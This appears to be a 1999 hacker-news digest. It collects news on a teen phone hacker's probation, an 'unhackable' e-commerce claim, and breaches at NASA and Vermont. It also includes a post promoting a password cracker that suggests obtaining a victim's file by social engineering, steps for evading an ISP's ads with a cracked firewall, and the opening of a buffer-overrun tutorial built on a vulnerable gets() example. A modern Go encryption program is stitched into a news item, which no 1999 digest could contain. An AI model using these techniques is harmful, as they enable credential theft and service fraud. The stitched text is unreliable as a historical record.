SUGAR LAND, Texas -- From the blackness of his bedroom, Dark Spyre would be awakened by a desk lamp clicking on. Hooked to his computer, it would signal him - sometimes in the middle of the night - that a fellow hacker was ready to begin.

For several weeks in late 1993 and early 1994, Ryan David Schwartz, alias Dark Spyre, was a high school senior by day, a computer hacker by night. Breaking the security code of a long-distance phone company based in Mississippi, he was able to charge thousands of dollars worth of computer bulletin board calls to the company.

When Sugar Land police showed up at the Houston-area home he shared with his grandparents and mother in March 1994, Schwartz confessed to hacking. They took his computer, all of the components, even the desk lamp.

Indicted on two counts of felony theft a month after his graduation, he pleaded guilty in January 1995. He was sentenced to five years' deferred adjudication - a punishment that would expunge the conviction from his record if successfully completed - plus 450 hours of community service, court costs and nearly $5,000 restitution.

Now, just a year shy of completing his probation, Schwartz faces a motion to revoke the probation. Revocation could send him to prison and end his pursuit of a degree at Baylor University in Waco.
From Schwartz's perspective, the Fort Bend County District Attorney's Office set him up for failure from the start and has treated him more like a violent criminal than an intelligent young man who made a mistake and was willing to pay for it.

From the prosecutor's perspective, Schwartz has been thumbing his nose at the court and deserves to be punished. Not only has he ignored probation conditions that included orders not to use a computer, but he has abused a string of second chances, Assistant District Attorney Mike Elliott said.

"It's a shame in a lot of ways, because he's a bright kid," said Elliott, who, coincidentally, is the computer expert in his office. "But he just can't leave it alone. He's got an addiction."

Schwartz denied violating his probation. He insisted that he has been walking the straight and narrow - working nearly full-time at a Service Merchandise store in Waco, attending classes at Baylor and frantically rushing back to Fort Bend County every Friday afternoon to meet with his probation officer. Sugar Land, an affluent community just outside of Houston, is about 150 miles from Waco.

He said he has not used a computer and that fellow students have typed papers for him, which, according to his understanding of the probation, was allowed.

Elliott said the ruling was clear: Schwartz is forbidden from using a computer, period. Allowing someone else to use a computer on Schwartz's behalf, and using Schwartz's password, is the same as if Schwartz had used it, Elliott said.

"I'm just trying to get school done and get a degree and get a career going," said Schwartz, now 23.

Elliott contended that Schwartz doesn't merit pity. Not only did Schwartz ignore a warning from LDDS Metromedia Communications, the long-distance company, to stop hacking long before the criminal charges were filed, but he also violated his probation by accessing the Internet and using a computer, the prosecutor said.

"It's a game to them," he said of computer hackers.
"They don't see the danger, the real harm in what they're doing. Many people are under the misconception that if you do a crime on the computer, it's not that bad, like murdering somebody.

"But it is a crime - a felony crime. How many people's phone bills went up because of acts he and others did? Everybody pays for his kind of crime."

Schwartz's probation problems started early, when he contended that his severe asthma prevented him from the lawn-cutting and outdoor maintenance chores that are typical of community service.

He had enrolled at the University of Houston in August 1994 and attended classes there through May 1995. After his enrollment at Baylor in July 1995, the community-service hours became more difficult to complete.

In September 1997, the first motion to revoke Schwartz's probation was filed, alleging that he had failed to report to the probation department in February, May and June 1996 and that he had failed to perform community service.

A probation department report said Schwartz hadn't done service for a year. It also maintained that, even after being referred to light duty because of his asthma, Schwartz failed to report for community service in Waco.

He denied that, saying he had reported but wasn't given an assignment compatible with his health. At one point, he was instructed to clean out a dark, cellarlike room at a Waco charitable organization, he said. It was, he said, infested with rats, an environment his asthma was unable to tolerate. He kept the job for only one day. A promised assignment in a library never materialized.

"I was willing to do the work," he said.

After a hearing in December 1997, state District Judge Bradley Smith did not revoke his probation but made several changes in its terms. Schwartz was given an additional 600 hours of community service, to be completed by Jan. 1, 1999. And he was forbidden from operating a computer without written court permission.
Schwartz took off a semester and reported for work daily at the Precinct 4 justice-of-the-peace office to complete his community service.

His mother, Linda Schwartz, a secretary, paid the restitution, and his grandparents, Greta and Izu Schwartz, 71 and 73 respectively, helped pay lawyer and bond fees. Already, the family had stacked up about $50,000 in payments to bail bondsmen and lawyers.

The family thought that the ordeal was nearing an end and that Schwartz could finish college and get his degree in finance and management information systems. He wants to have a career in financial consulting or investments.

Schwartz applied for early termination of his probation after he completed his community service, but was turned down. Although the court granted his request to return to Baylor, he was told to report to the probation office in Richmond at 4 p.m. every Friday.

Schwartz said he did his best to comply, leaving as soon as classes or work were through and driving hard to make the deadline. But he was late three times, clocking in at 4:25 p.m. one time, at 4:31 p.m. another time and at 4:16 p.m. another.

After using several lawyers, the family hired Houston attorney Dick DeGuerin to try again to get the probation terminated early. Schwartz obtained a letter from an associate dean at Baylor, saying he lacked 39 hours to graduate and would have to have access to a computer to complete his course work. An assistant professor at Baylor wrote to Judge Smith, asking that Schwartz be allowed to use a computer "and move on to a career in business."

While supportive letters were filling Schwartz's court file, Elliott was getting tips that the probationer was actively using the computer, the Internet and e-mail at Baylor.

The second motion to revoke his probation was filed in March. It is set for a June 10 hearing before Smith, who has a reputation around the courthouse of being tough on wayward probationers.
The Schwartz family views the latest development as continued torture, referring to Elliott as a persecutor instead of a prosecutor.

"The goal is to put him in jail. That's what they want," said Linda Schwartz, 47. "He was young and foolish," she said, but he has paid for his mistake. "Now we don't know what to do. We're going crazy."

Elliott, meanwhile, is preparing for the hearing. If Schwartz's probation is revoked, he could receive two to 10 years in prison.

"How many times can you thumb your nose at the court and get away with it?" Elliott asked. "He would have had a very bright future with some company. Why couldn't he do something constructive with his time instead of trying to beat the system?"

-----
(The Houston Chronicle web site is at http://www.chron.com/ )

@HWA

43.0 ACTINIC ecommerce package claims to be 'unhackable'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Actinic Catalog 3.0 called "Unhackable"
contributed by Weld Pond

Actinic Software LLC has Actinic Catalog 3.0, a plug-and-play e-commerce software package. The company is making the claim that it uses unhackable technology. It almost sounds like an invitation. Will people ever learn that nothing is unhackable? It all depends on time and energy. Something says that the marketing department probably didn't run the press release by the engineers before they released it.

Update: May 21st HNN rumours section reports that www.actinic.com was supposedly cracked... (unconfirmed)

Excite News
http://news.excite.com:80/news/bw/990517/nj-actinic-software

Actinic Catalog 3.0 Offers Total Security for Online Shopping; "Unhackable" Technology Prevents Hackers from Accessing Online Ordering Information

Updated 9:53 AM ET May 17, 1999

EAST BRUNSWICK, N.J. (BUSINESS WIRE) - Actinic Software LLC, a leading provider of plug-and-play e-commerce software, today announced that its flagship product, Actinic Catalog 3.0, offers total security for online shoppers.
Catalog 3.0 is a low-cost, easy-to-use software package that provides all the tools for e-commerce merchants to rapidly build and deploy secure online stores. The software's military-strength security eliminates vulnerabilities for merchants and their customers, ensuring that sensitive information cannot be compromised.

Recent breaches in e-commerce security have turned a critical eye to the safety of online shopping. Some platforms, whether ill-equipped or improperly installed, save customer order information in a decrypted file on the server, exposed to anyone with access to the Internet. This not only includes the experienced hacker, but the average Web surfer with the right search terms. Unlike other third-party e-commerce systems, Catalog 3.0 encrypts all financial details on the Web server, which are deleted once orders are downloaded to the merchant's PC. Using 128-bit encryption, approved for use by major banks, Catalog 3.0 guarantees complete protection for online shoppers.

"To avoid placing confidential customer information in jeopardy, e-commerce platforms must cover all the bases when it comes to ensuring online security -- from protecting files stored on the Web server, to accounting for the possibility of human error," explained Kevin Grumball, CEO of Actinic Software. "Catalog offers an easy-to-use interface, and keeps sensitive information encrypted at all times, eliminating all possible security hazards for online shoppers."

To ensure total e-commerce security, Catalog 3.0 encrypts sensitive data on the buyer's PC using a Java applet, and also operates with SSL sites. Credit-card purchases are securely processed through the site using 128-bit encryption. Orders are downloaded directly to the merchant's PC for processing. The Web server is used only as a mailbox, to which only the merchant holds the key.
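The arrangement in that last sentence (the web server as a mailbox that only the merchant can open) is a real and useful pattern, and it is worth seeing in working code beside the weak one the release criticises, where the order lands in a readable file on the server. The Go program below is an added example written for this digest; it is not Actinic's code, and nothing is known about Catalog 3.0's internals beyond what the release says. The release names only "128-bit encryption" and a Java applet on the buyer's PC, so the cipher choices (a fresh AES-256-GCM key per order, wrapped with RSA-OAEP to the merchant's public key), the Order fields, the sample card number and the fact that SealOrder runs as one function standing in for whichever side does the sealing are all assumptions of the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/json"
	"fmt"
)

// Order is the sensitive record a shopper submits (constructed field names).
type Order struct {
	Customer string `json:"customer"`
	Card     string `json:"card"`
}

// SealedOrder is all the web server keeps: the order as AES-GCM ciphertext plus
// the per-order key wrapped to the merchant's RSA public key.
type SealedOrder struct {
	WrappedKey []byte
	Nonce      []byte
	Ciphertext []byte
}

// GenerateMerchantKey runs on the merchant's PC; only &priv.PublicKey goes to the server.
func GenerateMerchantKey() (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, 2048)
}

// randomBytes draws n bytes from the OS CSPRNG; failure is not recoverable.
func randomBytes(n int) []byte {
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return b
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// SealOrder is the "mailbox" pattern, run on the web server: each order is sealed
// under a fresh AES-256 key that is RSA-OAEP-wrapped to the merchant's public key.
func SealOrder(pub *rsa.PublicKey, o Order) (SealedOrder, error) {
	plaintext, _ := json.Marshal(o) // a struct of strings: Marshal cannot fail here
	key := randomBytes(32)
	gcm, err := newGCM(key)
	if err != nil {
		return SealedOrder{}, err
	}
	nonce := randomBytes(gcm.NonceSize())
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return SealedOrder{}, err
	}
	return SealedOrder{wrapped, nonce, gcm.Seal(nil, nonce, plaintext, nil)}, nil
}

// OpenOrder runs on the merchant's PC; GCM rejects a record altered on the server.
func OpenOrder(priv *rsa.PrivateKey, s SealedOrder) (Order, error) {
	var o Order
	key, err := rsa.DecryptOAEP(sha256.New(), nil, priv, s.WrappedKey, nil)
	if err != nil {
		return o, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return o, err
	}
	plaintext, err := gcm.Open(nil, s.Nonce, s.Ciphertext, nil)
	if err != nil {
		return o, err
	}
	err = json.Unmarshal(plaintext, &o)
	return o, err
}

func main() {
	priv, err := GenerateMerchantKey()
	if err != nil {
		panic(err)
	}
	o := Order{Customer: "Sample Shopper", Card: "4111111111111111"} // constructed; a standard test card number
	clear, _ := json.Marshal(o) // the weak pattern: a readable order file on the server
	sealed, err := SealOrder(&priv.PublicKey, o)
	if err != nil {
		panic(err)
	}
	fmt.Println("card visible in clear / sealed record:", bytes.Contains(clear, []byte(o.Card)), bytes.Contains(sealed.Ciphertext, []byte(o.Card)))
	back, err := OpenOrder(priv, sealed)
	fmt.Println("merchant recovers the order:", err == nil && back == o)
}
```

Run with go run: the clear record contains the card number and the sealed one does not, and the merchant recovers the order with a private key that never touched the web server; a byte flipped in the stored ciphertext makes OpenOrder return an error instead of decrypting to garbage. What the pattern does not deliver is what the release claims. It protects orders once they are written, but whoever controls the server also controls the public key handed to the shopper and the applet or page that performs the sealing, so a server compromise still exposes new orders. That is the gap between "encrypted on the server" and "unhackable".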
No sensitive data is ever visible on the server, and all details are stored safely on the merchant's PC, providing customers with the end-to-end security they need.

Catalog 3.0 offers all the components necessary to build a fully secure e-commerce site. The total solution includes a Web-based catalog, electronic shopping cart, online ordering, expanded payment options, encrypted security, and more. Catalog 3.0 is available now, priced at $399. Contact Actinic for more details.

About Actinic Software LLC

Founded in 1996, Actinic Software LLC is located in East Brunswick, N.J., with offices in the UK. The company develops Internet commerce software solutions. Its flagship product, Actinic Catalog 3.0, is a secure, low-cost, and easy-to-use plug-and-play solution for the rapid deployment and maintenance of an e-commerce site. Visit Actinic Software on the Web at http://www.actinic.com.

Contact: Actinic Software, East Brunswick
Kevin Grumball, 732/238-8007
kgrumball@actinic.com
or
Springboard Communications
Kevin McLaughlin, 732-863-1900
kmclaughlin@s-board.com

@HWA

44.0 MP3's off the net?
     ~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

MP3 Web sites to be Reported
contributed by Space Rogue

M. Ken Co., Ltd., a developer of electronic watermarking technology, will begin on June 1st to list web sites that contain illegal MP3s. The company will offer these lists to companies that are seeking copyright infringements on the web; it will also publish this information on its web site. The service will use an agent developed by M. Ken. The agent can search for and locate MP3 files on the Web. During a test over 400 illegal sites were found.

AsiaBiz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70746

@HWA

45.0 Free DNS!
     ~~~~~~~~~

From HNN http://www.hackernews.com/

FREE DNS!
contributed by ratko

IHN is a project being built to bring people free host names and URL forwarding as well as many more features.
Like the now defunct ml.org, IHN promises DNS for the masses. There are also free URL forwarding hosts and, soon to come, IRC proxying. "Now you can go to any IRC server and have your domain show up as an IHN domain. Currently in progress..." Domains include ihn.org, clan.net and darpa.org ...

Internet Host Network
http://www.ihn.org

@HWA

46.0 pIRCHCrack cracks password in pirch.ini files
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 14 May 1999 04:56:55 PDT
Reply-To: Mike Arnold
Sender: Bugtraq List
From: Mike Arnold
Subject: pIRCH32/98 Exploit
To: BUGTRAQ@netspace.org

pIRCH version 32 and 98 save the user's NickName password onto disk in c:\pirch32\pirch.ini or c:\pirch98\pirch.ini depending on what version. pIRCH encrypts the password, but I have released a program that can crack the password if you supply the .ini. You need to get the victim's pirch.ini file somehow, maybe Social Engineering or whatever, then run pIRCHCrack against it. The user may also use the same password for their ISP, E-mail ETC.

pIRCHCrack is available at http://members.xoom.com/zaiman/pirchcrack.zip

--Mike

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

@HWA

47.0 NASA vulnerable to attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

NASA Vulnerable To Attack
contributed by McIntyre

The General Accounting Office released a report yesterday (Thursday) that labels 135 of 155 of NASA's mission-critical systems as not meeting the agency's own requirements for security. The GAO enlisted the help of the NSA to simulate an attack on NASA using publicly available tools such as war dialers. Although NASA performed an internal review of its information security policies last May that found many of the same problems identified by the GAO, few of the recommended fixes had been implemented. Satellite command and control systems as well as launch controls are not linked to the internet and were not at risk during these simulated attacks.

MSNBC
http://www.msnbc.com/news/271662.asp
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0517/web-nasa-5-20-99.html

MAY 20, 1999 . . . 17:20 EDT
Federal Computer Week

GAO unearths computer security weaknesses at NASA
BY DIANE FRANK (dfrank@fcw.com)

Many of NASA's mission-critical information systems are vulnerable to attack, and almost all the systems do not meet the agency's own requirements for risk assessment, according to a General Accounting Office report released today.
In tests conducted by GAO at one of NASA's field centers, experts were able to penetrate several mission-critical systems, including one responsible for calculating the positioning data for spacecraft. "Having obtained access to these systems, we could have disrupted NASA's ongoing command and control operations and stolen, modified or destroyed system software and data," the report states.

GAO attributed much of the success of the attacks to NASA's lack of consistent information security management and policies as suggested by GAO's 1998 Executive Guide. And although NASA performed a special review of its information security program last May that found many of the same problems identified by GAO, few of the recommended fixes have been started, according to the report.

GAO recommended that NASA put in place an agencywide security program addressing five areas: assessing risks and evaluating needs; implementing policies and controls; monitoring compliance with policy and effectiveness of controls; providing computer security training; and coordinating responses to security incidents.

@HWA

48.0 Vermont's Security Compromised
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

Yet another Cold Fusion hole is responsible for the security breaches of the web site of the state of Vermont. Bob West, the state's deputy chief information officer, claimed the state's computers that contain the home page and other public documents are not considered secure against computer attack. (There are a lot of pretty funny, or pretty sad, quotes in this article.)

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
The Boston Globe
http://www.boston.com/dailynews2/141/region/Hackers_get_into_state_of_VermP.shtml

Hackers get into state of Vermont computer system
By Wilson Ring, Associated Press, 05/21/99 09:48

MONTPELIER, Vt.
(AP) - Hackers cracked into the state's computer system Thursday, inserting at least three unauthorized messages into it.

State officials said they received no complaints from the public about anything that appeared on the state's World Wide Web site.

A computer security official from Boston said that for at least four hours Thursday morning a visitor to the state's home page was greeted by a page entitled "Hackfactor X" that contained a series of profanities and the message, "Well, I can see how well our tax dollars are being spent on computer security."

Hidden deep into the state's system, which is not readily accessible to the public, was another message entitled "A Changing World" that was signed "hacked for freedom," and another that carried the caption, "use this only for good, not evil."

State officials were initially unaware of the assault on their computers. But once the location of the messages was pointed out by The Associated Press they were erased within minutes.

Bob West, the state's deputy chief information officer, said there was no evidence the main Web page was tampered with.

"I am not sure where that came from," West said of the report. "I would have gotten e-mails like crazy if that had happened."

But he was also unaware that the less public files had been tampered with until they were pointed out to him.

"Most people would never have found that," he said.

In any event, the state's computers that contain the home page and other public documents are not considered secure against computer attack, West said.

"Anything on that box is backed up and is restorable and is not considered confidential," West said. If the system failed, "it wouldn't stop any operation in state government."

Critical state business - such as personnel and tax records - is done on computers that are protected by "firewalls" and are believed invulnerable to unauthorized access, West said.
The hacker took advantage of the software that runs the state's computer servers, said Weld Pond, a computer security consultant with the Boston company l0pht. The vulnerability of the software has been well known, but it was installed on many computer systems years ago and officials never bothered to correct the problem, Pond said.

Pond looked at the state's page and said it appeared it was hacked twice on Thursday. The last illegal visitor "closed" the hole that allowed the site to be hacked, he said.

"Hackers definitely close holes after they are in," Pond said. "They don't want somebody else in it."

The attack on the state system was first reported on the computer Web site known as attrition.org. The site is used to point out to the information industry how vulnerable computer systems can be and to record those assaults for history.

B.K. DeLong of Boston helps maintain the site. He said he got an e-mail message at about 4:30 a.m. pointing out the assault on the Vermont system. He said the untraceable e-mail was probably sent by the hacker, who wanted to highlight his or her achievement.

DeLong said he saw the Hackfactor X site at about 8:30. It had been taken off the state system by about 9 a.m.

"They can insist all they want, but it's been seen," DeLong said of West's denial about the tampering.

The site that DeLong said was posted in place of the state's traditional home page can still be viewed at www.attrition.org/mirror/attrition.

Computer hacking is a federal crime, but Vermont's U.S. Attorney, Charles Tetzlaff, said Thursday he was unaware of the assault on the state's home page.

@HWA

49.0 NIST May Be Named Info Security Clearing House
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by erewhon

The House Science Committee will soon push to update the 1989 Computer Security Act. The new bill will closely resemble the Computer Security Enhancement Act of 1997, which never made it out of the Senate.
This new legislation would tap the National Institute of Standards and Technology (NIST) as the lead agency for information security. (What about NIPC, CERT, and the FBI? How many agencies do we need?) The new bill also pushes for increased federal use of commercial off-the-shelf products for security needs.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html

MAY 20, 1999 . . . 14:11 EDT

House panel aims to bolster security law

BY MARGRET JOHNSTON (margret_johnston@fcw.com)

WASHINGTON, D.C. -- The House Science Committee plans to make another push to update a 1989 law that requires civilian agencies to take measures to protect their computer systems, according to Rep. Constance Morella (R-Md.), chairwoman of the Technology Subcommittee of the House Science Committee.

The new bill, which could be introduced as early as next week, would revamp the 10-year-old Computer Security Act. The bill will closely resemble the Computer Security Enhancement Act of 1997, which the House passed only to have it die in the Senate last year, said Morella, speaking at a symposium sponsored by the SmartCard Forum.

Like the 1997 bill, the proposed legislation would tap the National Institute of Standards and Technology as the lead agency for information security. The preceding bill also would have required NIST to promote federal use of commercial off-the-shelf products for civilian security needs.

The committee first began its effort to revamp the existing law to reflect the proliferation of network technology that has left agency data more vulnerable to corruption and theft, Morella said in 1997.

@HWA

50.0 097M.Tristate Macro Virus Contained
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     From HNN http://www.hackernews.com/
     contributed by wdef-A

Symantec and Network Associates have posted new definitions to eradicate the 097M.Tristate macro virus.
This new virus, also known as Triplicate and Crown, cross-infects Microsoft Word documents, Excel spreadsheets, and PowerPoint presentations. The virus has the ability to destroy data and removes virus-warning protection from both Excel and Word.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11064,00.html

Hunters Contain Office Macro Virus
Symantec, McAfee inoculate for 097M.Tristate macro virus.
by Christian McIntosh, PC World
May 20, 1999, 6:38 p.m. PT

The heat of the race to detect and nullify new viruses appears second only to the contest among virus fighters to be first with the cure. Two antivirus leaders, Symantec and Network Associates' McAfee division, have nabbed a new macro virus that threatens files created by Microsoft Office applications. Both have posted new definitions that detect and eradicate the 097M.Tristate macro virus.

You can download the new definitions for any Symantec antivirus product from LiveUpdate, the company's antivirus service, which pushes virus updates to registered Symantec customers. "It's a scheduled component that checks frequently for new virus threats," says Enrique Salem, Symantec's chief technology officer. Unregistered Symantec customers can get the new definitions from the Symantec AntiVirus Research Center on the company's Web site.

You can also eradicate the 097M.Tristate virus using McAfee's VirusScan updated with the most recent definition file, available on the company's Web site. VirusScan also will prompt you to periodically update your virus definitions data.

"Trendy" Macro Viruses

Macro viruses similar to 097M.Tristate are popular among virus writers, according to Symantec officials. The 097M.Tristate macro virus cross-infects Microsoft Word documents, Excel spreadsheets, and PowerPoint presentations. The 097M.Tristate virus creates a viral workbook called BOOK1 in the Excel startup directory. In PowerPoint, 097M.Tristate adds a viral module that's linked to the AutoShape object covering an entire slide.
During its final leg, 097M.Tristate replaces the content of an infected Word document with viral code.

Once considered the exclusive domain of research labs, macro viruses have transitioned into general circulation. Despite its prolific reproduction, Symantec classifies 097M.Triplicate as rare, saying it has yet to spread beyond the United States. The 097M.Tristate macro virus, also known as Triplicate and Crown, is currently the eighth most common virus submitted to Symantec's lab. The company's Scan & Deliver system has received 132 submissions of the 097M.Tristate virus in the past two weeks.

McAfee classifies 097M.Tristate as high risk. The virus apparently removes virus-warning protection from both Excel and Word.

@HWA

51.0 "Hackers" Ruin Online Poll
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
     From HNN http://www.hackernews.com/
     contributed by The Silicon Sorceror

According to the Toronto Star, "online hackers" used ballot stuffing to spoil an online poll to find the popular winner of Ontario's political candidate debate. The poll was designed so that each person could vote only once, but apparently it wasn't designed well enough and "some political junkies with computer skills had the time to write programs defeating the precautions" (Translation: Somebody clicked their mouse button about 5 times and banged out a script).

The Toronto Star
http://www.thestar.com/editorial/news/990520NEW15b_NA-WEB20.html (article moved)

52.0 DSC v1.01 Released
     ~~~~~~~~~~~~~~~~~~
     From HNN http://www.hackernews.com/
     contributed by {b|4iz3}

DSC v1.01 has been released. DSC is a new e-zine for those who are taking their "first steps" into learning computer security. A good setup and easy readability are among the best parts of this new e-zine. Get yours today.
DSC v1.01 Released
http://bl4iz3.faithweb.com/hacking/

Sample article on 'free internet' access from the DSC website:

g3t fr33 1nt3rn3t 4cc3ss
fr0m {b|4iz3} of the -=D3P SQU4D CR3W=-
http://bl4iz3.faithweb.com/

[-=D3P SQU4D CR3W=- ASCII banner, http://bl4iz3.faithweb.com]
th1s h4ck pr0v1d3d t0 y0u by: {b|4iz3} 0f th3 -=D3P SQU4D CR3W=-

h0w t0 g3t fr33 1nt3rn3t 4cc3ss
br0ught t0 y0u by {b|4iz3}!

(Screen shot of the batch file running:)

    C:\>cd progra~1

    C:\program files\>

    C:\program files\>NetZero.bat

    C:\> Free Internet provided by:
         -=D3P SQU4D CR3W=-
         http://bl4iz3.faithweb.com
    Bad command or file name
    Bad command or file name

    Status: Running Program Files          Time Elapsed: 00:43

To get free internet access, please follow the following steps:

1) Download NetZero (A FREE ISP) at "http://members.xoom.com/HFDWPack/files/NetZero.exe"

2) Setup NetZero, and install into DEFAULT location.
   a) Sign on for the first time and answer all those stupid questions (or they'll deny you service)

3) Download ConSeal PC Firewall at "http://bl4iz3.faithweb.com/hacking/files/ConSeal.exe"

4) Install ConSeal PC Firewall, set it up as custom, and BLOCK ALL ICMP (this will stop all the ads NetZero will try and send you). REMEMBER: Install into DEFAULT locations.

5) Download ConSeal PC Firewall Crack at "http://bl4iz3.faithweb.com/hacking/files/ConSeal135Crack.zip"
   a) Replace FRW.EXE in the zip file with FRW.EXE in "c:\program files".

6) Download NetZero batch file (YOU MUST SAVE THIS TO "c:\program files"), create a link to this on the desktop, that way you can just double-click to free internet access anytime you want.

7) Now, every time you want to run your FREE internet access, just click on the NetZero batch file.

Now, to explain the glitches in their system:

NetZero sends a command, I believe through ICMP, which turns the dialup program into an ad banner. This banner shows the ads which makes this service free.

Now, the firewall blocks this command which turns the program into the ad banner. Therefore, the ad NEVER starts up, and as far as Net Zero knows, the command went through and BLAM, you're running a free ISP with NO ADS.

I have not, as of this date, checked what makes this program change into the ad banner, and eventually, I will TRY and find or make a crack for NetZero so you won't have to go through with all this Firewall stuff.

k0pywr0ng (k)1999 -=D3P SQU4D CR3W=-
Check out http://bl4iz3.faithweb.com/kopywrong/

53.0 Laser Pointers Illegal?
     ~~~~~~~~~~~~~~~~~~~~~~~
     From HNN http://www.hackernews.com/
     contributed by Code Kid

The San Francisco Housing and Social Policy Committee will soon classify laser pointers in the same category as spray paint, making it illegal for those under 18 to purchase or possess them. Since limiting the sale of spray paint cans has worked exceedingly well in preventing graffiti in major cities it is thought that a similar ban on laser pointers would be equally effective.
San Francisco Examiner
http://www.sfgate.com/cgi-bin/article.cgi?file=/examiner/archive/1999/05/20/EDITORIAL14125.dtl

Use a laser, go to jail
EXAMINER EDITORIAL WRITER
May 20, 1999

CONSIDER the what-can-go-wrong-WILL-go-wrong provisions of Murphy's Law and its corollaries, such as the Rule of Toast by which the buttered side always hits the floor. Next comes the Law of Unintended Consequences, particularly the high-tech subsections that gave us e-mail spam, undumpable atomic waste, MTBE in our water, extortionate ATM fees and surrender of privacy to corporate hackers.

Question: What do you get when you marry the laws of Murphy and Unintended Consequences? Answer: The laser pointer.

These ingenious devices, originally intended as high-tech aids to professors and lecturers, send little red beams as far as 1,500 feet. And, according to San Francisco Supervisor Michael Yaki, "These so-called toys can distract, annoy and even injure other people when misused."

Accordingly, Yaki persuaded the board's Housing and Social Policy Committee on Tuesday to approve a proposed ordinance patterned after laws in New York and other cities. It would make it a crime to sell laser pointers to persons under age 18. It would compel storekeepers to keep them locked up - as with cans of spray paint suitable for graffiti and tags - to discourage teen shoplifters. It would make it a serious crime to point a beam at another person's face or, because of the possibility of a driver's temporary blindness, at a moving vehicle.

Yes, it's true that the ban on sale of spray paint to juveniles didn't exactly put an end to tags and graffiti. And laser pointers are considerably less dangerous than the lethal handguns far too accessible to far too many kids. But we agree with Police Lt. Patricia Jackson, who called the pointers an annoyance with disruptive potential. The full board should approve Yaki's law and hope that it won't have unintended consequences of its own.
©1999 San Francisco Examiner Page A 26

@HWA

54.0 Exploiting NT buffer overruns
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     From HNS http://www.net-security.org/

NT 4 BUFFER OVERRUNS
by BHZ, Thursday 20th May 1999 on 10.50 pm CET

David Litchfield reported to BugTraq a study on exploiting NT 4 Buffer Overruns. "This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do". Read the study below.

Exploiting Windows NT 4 Buffer Overruns
A Case Study: RASMAN.EXE

Introduction

This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found in RASMAN.EXE.

This document may be freely copied and distributed only in its entirety and if credit is given.

Cheers,
David Litchfield

What is a buffer overrun?

A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into it, with the extra overflowing and overwriting information that may be crucial to the normal execution of the program.
Consider the following source:

    #include <stdio.h>

    int main ( )
    {
        char name[31];                       /* 31-byte buffer on the stack */
        printf("Please type your name: ");
        gets(name);                          /* no bound on the input: this is the overrun */
        printf("Hello, %s", name);
        return 0;
    }

When this source is compiled into a program and the program is run, it sets aside a block of memory on the stack to hold the name string: 31 bytes as declared, which the compiler rounds up to 32 to keep the stack aligned. Under normal operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator, which is basically a byte with a value of zero. So we need to add a null terminator to the end of the string, making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string.

If however, instead of entering "David", we entered "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", that is 40 capital As, then when the program reads in our input and places it in our buffer the buffer overflows: 40 will definitely not fit into 32. The extra 8 bytes land on whatever the compiler placed directly after the buffer, which in a frame like this is normally the saved copy of the EBP register followed by the function's return address. That is why 40 As are exactly enough to completely overwrite the return address, and the return address is what gets loaded into a special CPU register known as the Instruction Pointer, or EIP, when the function returns (the E stands for Extended, by the way).

A quick explanation of a register: a computer's processor has small memory storage units called registers. Access to the values held in these registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory address of the next instruction to execute.

What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes, or opcodes for short.
So when a program is running and the processor is executing one of the program's instructions, the EIP holds the memory address where the next instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address, pulls in the instruction found there, increments the EIP and executes that instruction. This process of fetching the opcode from the memory address pointed to by the EIP, incrementing the EIP and then executing the instruction continues until the program exits.

